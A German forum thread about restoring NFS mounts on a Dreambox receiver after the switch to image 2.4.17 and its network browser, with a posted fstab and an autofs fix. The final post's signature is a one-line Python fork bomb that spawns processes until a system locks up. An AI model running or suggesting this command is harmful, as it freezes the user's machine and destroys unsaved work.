Angepinnt Einbinden von NFS/CIFS Freigaben ab 2.4.17

  • Quellcode

    1. rootfs / rootfs rw,relatime 0 1
    2. proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
    3. sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
    4. devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620 0 0
    5. tmpfs /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0
    6. tmpfs /run tmpfs rw,nosuid,nodev,relatime,mode=755 0 0
    7. tmpfs /tmp tmpfs rw,relatime 0 0
    8. tmpfs /var/volatile tmpfs rw,relatime,mode=755 0 0
    9. /dev/disk/by-uuid/4616c949-5804-4e14-bc6a-4e6cf37b383b /media/sdcard auto auto,nofail 0 0
    10. /dev/disk/by-label/dreambox-data /data auto noauto,x-systemd.automount,nofail 0 0
    11. 192.168.2.35:/volume1/video /media/video nfs udp,x-systemd.automount,retrans=1,noauto,wsize=8192,x-systemd.idle-timeout=60,retry=0,nolock,rw,x-systemd.device-timeout=15,timeo=2,rsize=8192,vers=3,soft,nofail 0 0
    Alles anzeigen
    Hallo,

    seit ein paar tagen funktioniert mein NFS Mount vom Nas nicht mehr habe ihn nun komplett gelöscht und neu angelegt mit dem Netzwerkbrowser. meine Fstab sieht nun so aus. Im Mount Manger wird angezeigt das er gemounted ist aber wenn ich die Aufnahme Pfade einstellen will geht es nicht mehr. Es zeigt mir keine Verzeichnisse an. Hat jemand einen Tipp für mich?
  • Also ich mounte per auto.network und bei mir war im File /etc/auto.master.d/enigma2.autofs der Eintrag

    Quellcode

    1. /media/net /etc/auto.network --ghost
    wieder verschwunden nach dem Update der 7080 das ich gestern eingespielt habe.

    Nach dem Eintrag und einem Reboot war wieder alles normal eingehängt.
  • @HereiAm

    du kannst das zwar gerne so weiter nutzen, aber offiziell wird der Weg nicht mehr supportet, vielleicht fliegt das auch mal ganz aus dem Image. Früher oder später kommt man nicht mehr um den Netzwerkbrowser herum, also warum nicht gleich damit alles richtig einrichten?
    Gruß
    Hilfsbereit

    ... jeder GS, ist ein GS zu viel ...

    Skin LT6.FHD.MOD und mediaportal-weed-skins
    Screenshot richtig erstellen
  • Das ist jetzt keine NN2 spezifische Entscheidung, sondern DMM setzt jetzt einfach auf den Netzwerkbrowser, und supportet dementsprechend nur noch diesen. Ich hatte bis zur Umstellung auf den Netzwerkbrowser auch einen Mount per auto.network, der problemlos lief. Ich nutze das, weil der Netzwerkbrowser eben nicht das kann, was mit auto.network ging/geht. Vor-und Nachteile können dir die Experten hier sicher noch besser erklären, als ich ;) .
    Gruß
    Hilfsbereit

    ... jeder GS, ist ein GS zu viel ...

    Skin LT6.FHD.MOD und mediaportal-weed-skins
    Screenshot richtig erstellen
  • Und jetzt ist hier Schluss.
    Kein Support für den Automount. Lernt mit dem Netzwerkbrowser um zugehen der arbeitet mit den selben optionen und ist zuverlässig ich hab den jetzt schon einige wochen am laufen der macht keine zicken.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !